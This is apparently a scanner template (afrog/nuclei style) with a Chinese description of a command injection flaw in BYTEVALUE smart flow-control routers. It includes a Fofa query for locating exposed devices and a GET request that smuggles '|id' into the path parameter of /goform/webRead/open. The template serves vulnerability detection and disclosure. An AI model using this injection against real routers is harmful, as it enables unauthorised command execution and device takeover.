漏洞描述
百为智能流控路由器/goform/webRead/open 路由的 ?path 参数存在有回显的命令注入漏洞。攻击者可通过该漏洞在服务器端执行命令,写入后门,获取服务器权限,从而获取路由器权限。
Fofa: title="BYTEVALUE 智能流控路由器"
id: bytevalue-webread-rce
info:
name: 百为智能流控路由器命令执行
author: zan8in
severity: critical
verified: true
description: |-
百为智能流控路由器/goform/webRead/open 路由的 ?path 参数存在有回显的命令注入漏洞。攻击者可通过该漏洞在服务器端执行命令,写入后门,获取服务器权限,从而获取路由器权限。
Fofa: title="BYTEVALUE 智能流控路由器"
reference:
- https://mp.weixin.qq.com/s/h0hUSZbjM15ehEfRqcb5eQ
tags: bytevalue,rce
created: 2024/01/07
rules:
r0:
request:
method: GET
path: /goform/webRead/open/?path=|id
expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0()